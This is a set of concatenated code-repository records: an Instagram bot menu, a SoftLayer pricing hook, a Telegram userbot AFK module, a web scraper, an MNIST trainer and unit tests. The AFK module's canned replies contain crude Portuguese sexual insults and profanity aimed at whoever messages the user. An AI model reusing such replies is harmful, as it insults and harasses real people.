elif get == 3 :\n\n username = userName() #---------CALLING AND GETTING USERNAME FROM USERNAME() FUNCTION-------#\n get_user_id(username)\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 4 :\n\n # -----getting user-INFO----#\n username = userName()\n\n get_user_info(username)\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 5 
:\n\n # -----getting user recent-POST & saving it as (danish.jpg)------#\n username = userName()\n get_user_post_info(username)\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 6 :\n\n # -----give a like to user's recent post------#\n\n like_a_post()\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 7 :\n\n #------Hit a comment on user post----------#\n post_a_comment()\n elif get == 8 :\n #--------Get to know which recent pic is liked by me of the user & download it-------#\n user_post_like_by_me()\n elif get == 9 :\n\n #--------- Download the all posts of user--------#\n get_all_posts()\n elif get == 10 :\n #-------Download most commented own post-------#\n most_commented_post()\n elif get == 11 :\n #------- download most liked own post-------#\n most_liked_post()\n elif get == 12:\n\n #-------Download most commented user post--------#\n most_commented_user_post()\n elif get == 13 :\n\n #-------Download most liked user post-------#\n most_liked_user_post()\n elif get == 14 :\n #---------Get a pie chart---------#\n pie_chart()\n elif get == 15 :\n\n #-------Target a comment on user's post caption------#\n caption_comment()\n elif get == 16 :\n #--------Press 9 if u wanna terminate the program------#\n var = False\n print(\"-----------------------------------------------------------------------------------------------------\")\n\n else :\n print(\"Please enter a valid number..\")\n\n\n\n\n\nmain()\n\n\n\n\n\n\n\n\n","repo_name":"lakshayrajput/Instabot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15506520430","text":"\"\"\"\nCalculates the on-demand rate for the chosen IBM instance type.\n\nRate is displayed in the time units chosen in Rates Options. 
Assumes the\ncurrency is USD, edit this action to change it.\n\nThis file is applied when provisioning a server.\nThese rates are updated regularly by the 'Refresh Server Rates' recurring job.\n\"\"\"\n\n\nfrom decimal import Decimal\nimport os.path\nimport ijson\nimport json\nimport time\nimport re\nimport requests\n\nfrom multiprocessing import Process, Queue\n\nfrom django.conf import settings\nfrom django.core.cache import cache\n\nimport SoftLayer\n\nfrom costs.utils import default_compute_rate\nfrom resourcehandlers.aws.aws_wrapper import get_region_title\nfrom resourcehandlers.aws.models import AWSHandler\nfrom utilities.filesystem import mkdir_p\nfrom utilities.logger import ThreadLogger\nfrom utilities.models import GlobalPreferences\n\nNUMBER_OF_HOURS = {\n \"HOUR\": 1,\n \"DAY\": 24,\n \"WEEK\": 192,\n \"MONTH\": 720, # assumes 30-day month\n \"YEAR\": 8760, # assumes 365-day year\n}\n\nlogger = ThreadLogger(__name__)\n\ndef get_client(environment):\n resource_handler = environment.resource_handler\n api_kwargs = {\n \"username\": resource_handler.serviceaccount,\n \"api_key\": str(resource_handler.servicepasswd),\n }\n client = SoftLayer.create_client_from_env(**api_kwargs)\n return client\n\ndef get_price(environment, cpus, memory):\n client = get_client(environment)\n manager = SoftLayer.OrderingManager(client)\n if cpus == 1:\n cpu = 'GUEST_CORE_' + str(cpus)\n else:\n cpu = 'GUEST_CORES_' + str(cpus)\n memory = 'RAM_' + str(memory) +'_GB'\n\n try:\n location_groups = [data_center['groups'] for data_center in client.call('SoftLayer_Location', 'getDatacenters', mask='groups') if data_center['name'] == environment.slayer_datacenter]\n location_group_ids = []\n for location_group in location_groups:\n for location in location_group:\n location_group_ids.append(location['id'])\n\n item_prices = client.call('SoftLayer_Product_Package', 'getItemPrices', id=835)\n\n cpu_cost = [float(cost['hourlyRecurringFee']) for cost in item_prices if (cost['locationGroupId'] in location_group_ids and cost['item'].get('keyName') == cpu)][0]\n memory_cost = [float(cost['hourlyRecurringFee']) for cost in item_prices if (cost['locationGroupId'] in location_group_ids and cost['item'].get('keyName') == memory)][0]\n total_cost = cpu_cost + memory_cost\n return total_cost\n except Exception as e:\n print('-------------------------')\n print(e)\n return 0\n\ndef compute_rate(group, environment, resource_technology, cfvs, pcvss,\n os_build, apps, quantity=1, **kwargs):\n\n override_defaults = kwargs.pop(\"override_defaults\", False)\n\n if override_defaults:\n # This is also useful for testing to check whether we returned rates just from IBM.\n logger.info(f\"Only including IBM-specific rates from the IBM rate hook.\")\n rate_dict = {}\n else:\n # The rate_dict below will include any Software or Extra rates from the Admin/Rates settings.\n # You can modify this file to exclude these rates.\n rate_dict = default_compute_rate(\n group,\n environment,\n resource_technology,\n cfvs,\n pcvss,\n os_build,\n apps,\n quantity,\n **kwargs,\n )\n # Override Hardware rates for consistency; so that we don't return the\n # default CPU/Disk Rates, which would be misleading about whether we got the\n # rate from IBM.\n rate_dict.update({\"Hardware\": {}})\n logger.info(f\"Including the default Admin/rates in the IBM rate hook.\")\n\n server_preset = []\n for cfv in cfvs:\n if cfv.field.name == 'cpu_cnt':\n cpus = cfv.value\n if cfv.field.name == 'mem_size':\n memory = cfv.value\n rate = get_price(environment, cpus, 
memory)\n\n rate_time_unit = GlobalPreferences.objects.get().rate_time_unit\n number_of_hours = NUMBER_OF_HOURS.get(rate_time_unit, 0)\n rate_dict.update({\n \"Hardware\": {\n \"Instance Type\": Decimal(rate)\n },\n })\n return rate_dict\n\n# [p for p in manager.get_item_prices(835) if (p['locationGroupId'] is not None and p['item'].get('units') == 'CORE')]\n# [preset for preset in client.call('SoftLayer_Product_Package_Preset', 'getAllObjects') if (preset['keyName'].startswith(\"B1\") and preset['keyName'].endswith('25'))]\n\n# mlist = []\n# for i in [k['groups'] for k in client.call('SoftLayer_Location', 'getDatacenters', mask='groups') if k['name'] == 'ams01']:\n# for l in i:\n# mlist.append(l['id'])\n\n# item_prices = client.call('SoftLayer_Product_Package', 'getItemPrices', id=835, filter={\"locationgroupid\": 503})\n\n# cpu_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'GUEST_VCORE_2')]\n# memory_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'RAM_2_GB')][0]\n\n# cpu_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'GUEST_4_VCORES')][0]\n# memory_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'RAM_8_GB')][0]\n\n# print(cpu_cost + memory_cost)\n\n# def x():\n# for preset in presets:\n# if [int(server_value) for server_value in preset['keyName'].split('_')[1].split('X')[:2]] == server_values:\n# print(sum([float(price['hourlyRecurringFee']) for price in manager.get_preset_prices(preset['id'])['prices']]))","repo_name":"rnjane/boan","sub_path":"boanapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6229224292","text":"import time\nfrom datetime import datetime\nfrom random import choice\n\nfrom telethon.events import StopPropagation\n\nfrom userbot import CMD_HELP # noqa\nfrom userbot.events import register\n\nfrom userbot import ( # noqa pylint: disable=unused-import isort:skip\n AFKREASON,\n BOTLOG,\n BOTLOG_CHATID,\n CMD_HELP,\n COUNT_MSG,\n ISAFK,\n PM_AUTO_BAN,\n USERS,\n)\n\n# ========================= CONSTANTS ============================\nAFKSTR = [\n \"Estou no modo baiano fdp nao me \",\n \"Estou no modo baiano fdp para de me incomoda\",\n \"Filha da puta tá vendo que eu tô em afk caraio.\",\n \"Vai se fode estou em afk pare de me mencionar !.\",\n \"Espera eu voltar arrombado !.\",\n \"Si continuar me mencionando eu vou comer teu cu eu tou em afk fdp\",\n \"Estou baianando pode esperar o pai cair da rede.\",\n \"Desculpa ae fml o pai n tá on !.\",\n \"Si for o kadso que tiver me mencionando vai tomar no cu.\",\n \"Tô em afk agora !\",\n \"AAAAAAAAAAAAAAAAAAAAAA FILHA DA PUTA EU TO OFF DESGRAÇA\",\n \"Si for o junin que tiver me marcando vai tomar no cu.\",\n \"Eu fui comer seu cu\\n---->\",\n \"Eu fui voltei ta um oco agora\\n<----\",\n \"Ado ado quem me chamou e viado.\",\n \"Fodase kadso eu estou em afk\",\n \"Oi estou em afk gostosa por favor n me chamar ok ?\",\n \"Seu cu\",\n \"Lmao. 
\",\n \"ok depois eu ti como\",\n \"To no zapzap!\",\n \"to cagando arrombado..\",\n \"ate?\",\n]\n\nglobal USER_AFK # pylint:disable=E0602\nglobal afk_time # pylint:disable=E0602\nglobal afk_start\nglobal afk_end\nUSER_AFK = {}\nafk_time = None\nafk_start = {}\n\n# =================================================================\n\n\n@register(outgoing=True, pattern=\"^.afk(?: |$)(.*)\", disable_errors=True)\nasync def set_afk(afk_e):\n \"\"\" For .afk command, allows you to inform people that you are afk when they message you \"\"\"\n afk_e.text\n string = afk_e.pattern_match.group(1)\n global ISAFK\n global AFKREASON\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n global reason\n USER_AFK = {}\n afk_time = None\n afk_end = {}\n start_1 = datetime.now()\n afk_start = start_1.replace(microsecond=0)\n if string:\n AFKREASON = string\n await afk_e.edit(\n f\"Ativei o modo baiano!\\\n \\nRazão: `{string}`\"\n )\n else:\n await afk_e.edit(\"Ativei o modo baiano!\")\n if BOTLOG:\n await afk_e.client.send_message(BOTLOG_CHATID, \"#AFK\\nVocê ficou ausente!\")\n ISAFK = True\n afk_time = datetime.now() # pylint:disable=E0602\n raise StopPropagation\n\n\n@register(outgoing=True)\nasync def type_afk_is_not_true(notafk):\n \"\"\" This sets your status as not afk automatically when you write something while being afk \"\"\"\n global ISAFK\n global COUNT_MSG\n global USERS\n global AFKREASON\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n back_alive = datetime.now()\n afk_end = back_alive.replace(microsecond=0)\n if ISAFK:\n ISAFK = False\n msg = await notafk.respond(\"Não estou mais AFK.\")\n time.sleep(3)\n await msg.delete()\n if BOTLOG:\n await notafk.client.send_message(\n BOTLOG_CHATID,\n \"Você recebeu \"\n + str(COUNT_MSG)\n + \" mensagens de \"\n + str(len(USERS))\n + \" chats enquanto esteve fora\",\n )\n for i in USERS:\n name = await notafk.client.get_entity(i)\n name0 = str(name.first_name)\n await notafk.client.send_message(\n BOTLOG_CHATID,\n \"[\"\n + name0\n + \"](tg://user?id=\"\n + str(i)\n + \")\"\n + \" te enviou \"\n + \"`\"\n + str(USERS[i])\n + \" mensagens`\",\n )\n COUNT_MSG = 0\n USERS = {}\n AFKREASON = None\n\n\n@register(incoming=True, disable_edited=False)\nasync def mention_afk(mention):\n \"\"\" This function takes care of notifying the people who mention you that you are AFK.\"\"\"\n global COUNT_MSG\n global USERS\n global ISAFK\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n back_alivee = datetime.now()\n afk_end = back_alivee.replace(microsecond=0)\n afk_since = \"algum tempo atrás\"\n if mention.message.mentioned and not (await mention.get_sender()).bot:\n if ISAFK:\n now = datetime.now()\n datime_since_afk = now - afk_time # pylint:disable=E0602\n time = float(datime_since_afk.seconds)\n days = time // (24 * 3600)\n time = time % (24 * 3600)\n hours = time // 3600\n time %= 3600\n minutes = time // 60\n time %= 60\n seconds = time\n if days == 1:\n afk_since = \"Ontem\"\n elif days > 1:\n if days > 6:\n date = now + datetime.timedelta(\n days=-days, hours=-hours, minutes=-minutes\n )\n afk_since = date.strftime(\"%A, %Y %B %m, %H:%I\")\n else:\n wday = now + datetime.timedelta(days=-days)\n afk_since = wday.strftime(\"%A\")\n elif hours > 1:\n afk_since = f\"`{int(hours)}h{int(minutes)}m`\"\n elif minutes > 0:\n afk_since = 
f\"`{int(minutes)}m{int(seconds)}s`\"\n else:\n afk_since = f\"`{int(seconds)}s`\"\n if AFKREASON:\n await mention.reply(\n f\"Estou ausente fazem {afk_since}.\\\n \\nRazão: `{AFKREASON}`\"\n )\n else:\n await mention.reply(str(choice(AFKSTR)))\n USERS.update({mention.sender_id: 1})\n COUNT_MSG = COUNT_MSG + 1\n\n\n@register(incoming=True, disable_errors=True)\nasync def afk_on_pm(sender):\n \"\"\" Function which informs people that you are AFK in PM \"\"\"\n global ISAFK\n global USERS\n global COUNT_MSG\n global COUNT_MSG\n global USERS\n global ISAFK\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n back_alivee = datetime.now()\n afk_end = back_alivee.replace(microsecond=0)\n afk_since = \"algum tempo atrás\"\n if (\n sender.is_private\n and sender.sender_id != 777000\n and not (await sender.get_sender()).bot\n ):\n if PM_AUTO_BAN:\n try:\n from userbot.modules.sql_helper.pm_permit_sql import is_approved\n\n apprv = is_approved(sender.sender_id)\n except AttributeError:\n apprv = True\n else:\n apprv = True\n if apprv and ISAFK:\n now = datetime.now()\n datime_since_afk = now - afk_time # pylint:disable=E0602\n time = float(datime_since_afk.seconds)\n days = time // (24 * 3600)\n time = time % (24 * 3600)\n hours = time // 3600\n time %= 3600\n minutes = time // 60\n time %= 60\n seconds = time\n if days == 1:\n afk_since = \"Ontem\"\n elif days > 1:\n if days > 6:\n date = now + datetime.timedelta(\n days=-days, hours=-hours, minutes=-minutes\n )\n afk_since = date.strftime(\"%A, %Y %B %m, %H:%I\")\n else:\n wday = now + datetime.timedelta(days=-days)\n afk_since = wday.strftime(\"%A\")\n elif hours > 1:\n afk_since = f\"`{int(hours)}h{int(minutes)}m`\"\n elif minutes > 0:\n afk_since = f\"`{int(minutes)}m{int(seconds)}s`\"\n else:\n afk_since = f\"`{int(seconds)}s`\"\n if AFKREASON:\n await sender.reply(\n f\"Estou ausente fazem {afk_since}.\\\n \\nRazão: `{AFKREASON}`\"\n )\n else:\n await sender.reply(str(choice(AFKSTR)))\n USERS.update({sender.sender_id: 1})\n COUNT_MSG = COUNT_MSG + 1\n\n\nCMD_HELP.update(\n {\n \"afk\": \".afk [Motivo Opcional]\\\n\\nUso: Define você como ausente.\\nResponde qualquer pessoa que envia PMs/marca \\\nvocê e diz o motivo da ausência(razão).\\n\\nDesliga o AUSENTE quando digitar qualquer coisa, em qualquer lugar.\\\n\"\n }\n)\n","repo_name":"JoanLindo/BaianoBotv5","sub_path":"userbot/modules/afk.py","file_name":"afk.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31642200288","text":"#!/usr/bin/python\r\n#coding:utf-8\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport unicodecsv as csv\r\nimport re\r\n\r\n\r\nsave_file_name = \"result_all_3_multithreading-200-1.csv\"\r\nproxies = {\r\n \"http\": \"http://localhost:8080\",\r\n \"https\": \"http://localhost:8080\",\r\n}\r\n\r\nheaders = {\r\n \"Host\": \"47.52.164.88\",\r\n \"Origin\": \"http://47.52.164.88\",\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n \"Referer\": \"http://www.baidu.com\",\r\n \"Accept\": \"*/*\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\r\n \"Connection\": \"close\"\r\n}\r\n\r\ndef get_pages(id):\r\n url = 
\"http://47.52.164.88/test5.php?id=\"+str(id)\r\n try:\r\n # print 'crawlling: '+str(id)\r\n r = requests.get(url, proxies=proxies,headers=headers)\r\n # r = requests.get(url,headers=headers)\r\n result = r.content.decode('utf-8')\r\n except requests.exceptions.RequestException as e:\r\n print(e)\r\n print('retring'+str(id))\r\n return result\r\n\r\ndef parse_response(response):\r\n soup = BeautifulSoup(response,'lxml')\r\n #get course numbers\r\n course_all_num_string = soup.find('span',class_=\"course-all-num\").string\r\n #get the exact value from the whole string\r\n course_all_num = str(re.findall(r'\\d+',course_all_num_string)[0])\r\n #get course prices\r\n price = soup.find('span',class_='price').find_all('span')\r\n price_value = \"\"\r\n for span in price:\r\n price_value += span.string\r\n \r\n return course_all_num,price_value\r\n\r\n\r\n\r\n\r\ndef main():\r\n for i in range(1,21):\r\n response = get_pages(i)\r\n classnum,price = parse_response(response)\r\n print('id:',str(i),' classnum: ',classnum,' price: ',price)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"malongge/crawler","sub_path":"spider-7-css-1.py","file_name":"spider-7-css-1.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18949212019","text":"# coding: utf-8\n\n# checking for already existing files\nimport os\n# downloading/extracting mnist data\nimport gzip\nimport random # normal distirbution sampling\nfrom tqdm import tqdm # visualising progress\nimport numpy as np # loading data from buffer\n\nfrom fetch.math.linalg import MatrixDouble # our matrices\nfrom utils import * # activation functions\n\n\nclass MnistLearner():\n\n def __init__(self):\n\n self.data_url = 'http://yann.lecun.com/exdb/mnist/'\n\n self.x_tr_filename = 'train-images-idx3-ubyte.gz'\n self.y_tr_filename = 'train-labels-idx1-ubyte.gz'\n self.x_te_filename = 't10k-images-idx3-ubyte.gz'\n self.y_te_filename = 't10k-labels-idx1-ubyte.gz'\n\n self.training_size = 10000\n self.validation_size = 10000\n\n self.n_epochs = 30\n self.batch_size = 50\n self.alpha = 0.2\n\n self.mnist_input_size = 784 # pixels in 28 * 28 mnist images\n self.mnist_output_size = 10 # 10 possible characters to recognise\n\n self.activation_fn = 'relu'\n self.layers = [20]\n\n self.initialise_network()\n\n def initialise_network(self):\n\n # definition of the network layers\n self.net = []\n for i in range(len(self.layers)):\n self.net.append(self.layers[i])\n self.net.append(self.mnist_output_size)\n\n # instantiate the network weights once\n self.weights = [self.make_new_layer(\n self.mnist_input_size, self.net[0])]\n if len(self.net) > 2:\n for i in range(len(self.net) - 2):\n self.weights.append(self.make_new_layer(\n self.net[i], self.net[i + 1]))\n self.weights.append(self.make_new_layer(self.net[-2], self.net[-1]))\n\n # instantiate the gradients container once (and a temporary storage for\n # updates\n self.grads = []\n for i in range(len(self.weights)):\n self.grads.append(MatrixDouble(\n self.weights[i].height(), self.weights[i].width()))\n self.temp_grads = []\n for i in range(len(self.weights)):\n self.temp_grads.append(MatrixDouble(\n self.weights[i].height(), self.weights[i].width()))\n\n # pre-instantiate constant set of zeroed matrices for relu comparisons\n\n self.const_zeros = []\n for idx in range(len(self.weights)):\n if idx == 0:\n self.const_zeros.append(MatrixDouble.Zeros(\n self.batch_size, self.weights[idx].width()))\n else:\n 
self.const_zeros.append(\n MatrixDouble.Zeros(\n self.const_zeros[idx - 1].height(),\n self.weights[idx].width()))\n\n return\n\n def make_new_layer(self, in_size, out_size, mode='normal'):\n '''\n makes a new MLP layer\n :param in_size:\n :param out_size:\n :param mode:\n :return:\n '''\n denom = np.sqrt(in_size)\n layer = MatrixDouble(in_size, out_size)\n for i in range(layer.size()):\n if mode == 'constant': # constant values - for debugging\n layer[i] = 1.0 / denom\n if mode == 'uniform': # random uniform - our library\n layer[i] = (random.uniform(-1.0, 1.0)) / denom\n if mode == 'normal': # random normal distribution\n layer[i] = np.random.normal(0, 1) / denom\n return layer\n\n def load_data(self, one_hot=True, reshape=None):\n x_tr = self.load_images(self.x_tr_filename, self.training_size)\n y_tr = self.load_labels(self.y_tr_filename, self.training_size)\n x_te = self.load_images(self.x_te_filename, self.validation_size)\n y_te = self.load_labels(self.y_te_filename, self.validation_size)\n\n if one_hot:\n y_tr_onehot = MatrixDouble.Zeros(\n y_tr.height(), self.mnist_output_size)\n y_te_onehot = MatrixDouble.Zeros(\n y_te.height(), self.mnist_output_size)\n\n for i in range(len(y_tr)):\n y_tr_onehot[i, int(y_tr[i])] = 1\n for i in range(len(y_te)):\n y_te_onehot[i, int(y_te[i])] = 1\n\n if reshape:\n x_tr, x_te = [x.reshape(*reshape) for x in (x_tr, x_te)]\n\n if one_hot:\n self.y_tr = y_tr_onehot\n self.y_te = y_te_onehot\n else:\n self.y_tr = y_tr\n self.y_te = y_te\n self.x_tr = x_tr\n self.x_te = x_te\n\n def load_images(self, filename, data_size):\n self.download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n data = data.reshape(-1, 28 * 28) / 256\n nd_data = MatrixDouble(data_size, 28 * 28)\n nd_data.FromNumpy(data[:data_size, :])\n return nd_data\n\n def load_labels(self, filename, data_size):\n self.download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n data.reshape(np.shape(data)[0], -1)\n nd_data = MatrixDouble(data_size, 1)\n nd_data.FromNumpy(data[:data_size].reshape(data_size, -1))\n return nd_data\n\n def download(self, filename):\n if not os.path.exists(filename):\n from urllib.request import urlretrieve\n print(\"Downloading %s\" % filename)\n urlretrieve(self.data_url + filename, filename)\n\n return\n\n # feed forward pass of a network\n # take X input and the network (defined as a list of weights)\n # no biases?\n def feed_forward(self, X):\n\n a = [X]\n for idx in range(len(self.weights)):\n temp = MatrixDouble(a[-1].height(), self.weights[idx].width())\n temp = temp.Dot(a[-1], self.weights[idx])\n if self.activation_fn == 'relu':\n if ((self.const_zeros[idx].height() == temp.height()) and (\n self.const_zeros[idx].width() == temp.width())):\n temp = relu(temp, self.const_zeros[idx])\n else:\n temp = relu(temp, MatrixDouble.Zeros(\n temp.height(), temp.width()))\n\n elif self.activation_fn == 'sigmoid':\n temp = sigmoid(temp)\n else:\n print(\"unspecified activation functions!!\")\n raise ValueError()\n a.append(temp)\n return a\n\n # get the gradients of the network\n def update_weights(self, X, Y):\n\n # run a forward pass to get delta\n a = self.feed_forward(X)\n last_delta = a[-1] - Y # cross-entropy\n\n # calculate grads\n self.grads[-1] = self.grads[-1].TransposeDot(a[-2], last_delta)\n for i in range(len(a) - 2, 0, -1):\n # TODO: This dotTranspose gives a different answer from numpy;\n # probably because of Array Major Order\n new_delta = 
MatrixDouble(\n last_delta.height(), self.weights[i].height())\n new_delta.DotTranspose(last_delta, self.weights[i])\n if self.activation_fn == 'sigmoid':\n new_delta *= d_sigmoid(a[i])\n elif self.activation_fn == 'relu':\n new_delta *= (a[i] >= self.const_zeros[i - 1])\n else:\n raise ValueError()\n self.grads[i - 1] = self.grads[i -\n 1].TransposeDot(a[i - 1], new_delta)\n\n last_delta = new_delta\n\n # divide grads by batch size\n for i in range(len(self.grads)):\n self.grads[i] /= X.height()\n\n for i in range(len(self.weights)):\n self.weights[i] -= (self.grads[i] * self.alpha)\n\n return\n\n def train(self):\n\n X = MatrixDouble(self.batch_size, self.mnist_input_size)\n Y = MatrixDouble(self.batch_size, self.mnist_output_size)\n\n # epochs\n for i in range(self.n_epochs):\n print(\"epoch \", i, \": \")\n\n # training batches\n for j in tqdm(range(0, self.x_tr.height() -\n self.batch_size, self.batch_size)):\n\n # assign X batch\n for k in range(self.batch_size):\n for l in range(28 * 28):\n X[k, l] = self.x_tr[j + k, l]\n\n # assign Y batch\n for k in range(self.batch_size):\n for l in range(10):\n Y[k, l] = self.y_tr[j + k, l]\n\n # update weights\n self.update_weights(X, Y)\n\n temp = self.weights[0].Copy()\n temp.Abs()\n\n print(\"Getting accuracy: \")\n print(\"\\t getting feed forward predictions..\")\n cur_pred = self.feed_forward(self.x_te)[-1]\n\n print(\"\\t calculating argmaxes\")\n max_pred = cur_pred.ArgMax(1)\n gt = self.y_te.ArgMax(1)\n\n print(\"\\t comparing Y & Y^\")\n sum_acc = 0\n for i in range(self.y_te.height()):\n sum_acc += (gt[i] == max_pred[i])\n sum_acc /= self.y_te.height()\n\n print(\"\\taccuracy: \", sum_acc)\n\n return\n\n\ndef run_mnist():\n\n mlearner = MnistLearner()\n\n # load the data\n mlearner.load_data(one_hot=True)\n\n # being training\n mlearner.train()\n\n\n# import cProfile\n# cProfile.run('run_mnist()')\nrun_mnist()\n","repo_name":"fetchai/ledger","sub_path":"scripts/python_ml_lib/mnist_example/mnist_linalg_matrix_hand_coded_graph.py","file_name":"mnist_linalg_matrix_hand_coded_graph.py","file_ext":"py","file_size_in_byte":9577,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"78"} +{"seq_id":"13086994685","text":"import math\n\nclass Solution:\n def minCostClimbingStairs(self, cost: List[int]) -> int:\n clen = len(cost)+1\n minCost = [math.inf]*(clen)\n minCost[0]=minCost[1]=0\n for i in range(2,clen):\n minCost[i]=min((minCost[i-2]+cost[i-2]),(minCost[i-1]+cost[i-1]))\n return minCost[clen-1]","repo_name":"ragilr/leetcode","sub_path":"lcc-june2021/min-cost-climbing-stairs.py","file_name":"min-cost-climbing-stairs.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73073020411","text":"#!/usr/bin/python3\n\"\"\"unittests for base model\"\"\"\nimport unittest\nimport os\nimport uuid\nimport json\n\nfrom unittest.mock import patch\nfrom datetime import datetime, timedelta\nfrom models.base_model import BaseModel\nfrom models import storage\n\n\nclass TestBaseModel(unittest.TestCase):\n def setUp(self):\n self.base_model = BaseModel()\n\n def test_no_args_instantiates(self):\n self.assertEqual(BaseModel, type(BaseModel()))\n\n def test_id_is_public_str(self):\n self.assertEqual(str, type(BaseModel().id))\n\n def test_created_at_is_public_datetime(self):\n self.assertEqual(datetime, type(BaseModel().created_at))\n\n def test_updated_at_is_public_datetime(self):\n self.assertEqual(datetime, 
type(BaseModel().updated_at))\n\n def test_two_models_unique_ids(self):\n bm1 = BaseModel()\n bm2 = BaseModel()\n self.assertNotEqual(bm1.id, bm2.id)\n\n def test_str_representation(self):\n dt = datetime.today()\n dt_repr = repr(dt)\n bm = BaseModel()\n bm.id = \"123456\"\n bm.created_at = bm.updated_at = dt\n bmstr = bm.__str__()\n self.assertIn(\"[BaseModel] (123456)\", bmstr)\n self.assertIn(\"'id': '123456'\", bmstr)\n self.assertIn(\"'created_at': \" + dt_repr, bmstr)\n self.assertIn(\"'updated_at': \" + dt_repr, bmstr)\n\n def test_args_unused(self):\n bm = BaseModel(None)\n self.assertNotIn(None, bm.__dict__.values())\n\n def test_instantiation_with_kwargs(self):\n dt = datetime.today()\n dt_iso = dt.isoformat()\n bm = BaseModel(id=\"345\", created_at=dt_iso, updated_at=dt_iso)\n self.assertEqual(bm.id, \"345\")\n self.assertEqual(bm.created_at, dt)\n self.assertEqual(bm.updated_at, dt)\n\n def test_instantiation_with_None_kwargs(self):\n with self.assertRaises(TypeError):\n BaseModel(id=None, created_at=None, updated_at=None)\n\n def test_instantiation_with_args_and_kwargs(self):\n dt = datetime.today()\n dt_iso = dt.isoformat()\n bm = BaseModel(\"12\", id=\"345\", created_at=dt_iso, updated_at=dt_iso)\n self.assertEqual(bm.id, \"345\")\n self.assertEqual(bm.created_at, dt)\n self.assertEqual(bm.updated_at, dt)\n\n def tearDown(self):\n pass\n\n def test_attributes_existence(self):\n self.assertTrue(hasattr(self.base_model, 'id'))\n self.assertTrue(hasattr(self.base_model, 'created_at'))\n self.assertTrue(hasattr(self.base_model, 'updated_at'))\n\n def test_id_is_unique(self):\n b = BaseModel()\n self.assertNotEqual(b, self.base_model)\n\n def test_id_is_uuid(self):\n self.assertTrue(isinstance(self.base_model.id, str))\n try:\n uuid.UUID(self.base_model.id, version=4)\n except ValueError:\n self.fail(\"id is not a valid UUID\")\n\n def test_id_string(self):\n self.assertEqual(str, type(self.base_model.id))\n\n def test_created_at(self):\n self.assertIsInstance(self.base_model.created_at, datetime)\n\n def test_updated_at(self):\n self.assertIsInstance(self.base_model.updated_at, datetime)\n\n def test_save_method(self):\n original_updated_at = self.base_model.updated_at\n self.base_model.save()\n self.assertNotEqual(self.base_model.updated_at, original_updated_at)\n\n def test_save_with_arg(self):\n bm = BaseModel()\n with self.assertRaises(TypeError):\n bm.save(None)\n\n def test_save_updates_file(self):\n bm = BaseModel()\n bm.save()\n bmid = \"BaseModel.\" + bm.id\n with open(\"file.json\", \"r\") as f:\n self.assertIn(bmid, f.read())\n\n def test_save_saves_to_file(self):\n self.base_model.save()\n with open(\"file.json\", 'r', encoding='utf-8') as file:\n data = json.load(file)\n\n key = \"{}.{}\".format(\"BaseModel\", self.base_model.id)\n self.assertIn(key, data)\n\n def to_dict(self):\n obj_dict = self.__dict__.copy()\n obj_dict['__class__'] = self.__class__.__name__\n\n # Convert created_at and updated_at to ISO format strings\n if isinstance(self.created_at, datetime):\n obj_dict['created_at'] = self.created_at.isoformat()\n if isinstance(self.updated_at, datetime):\n obj_dict['updated_at'] = self.updated_at.isoformat()\n\n return obj_dict\n\n def test_to_dict_contains_correct_keys(self):\n bm = BaseModel()\n self.assertIn(\"id\", bm.to_dict())\n self.assertIn(\"created_at\", bm.to_dict())\n self.assertIn(\"updated_at\", bm.to_dict())\n self.assertIn(\"__class__\", bm.to_dict())\n\n def test_to_dict_contains_added_attributes(self):\n bm = BaseModel()\n bm.name = 
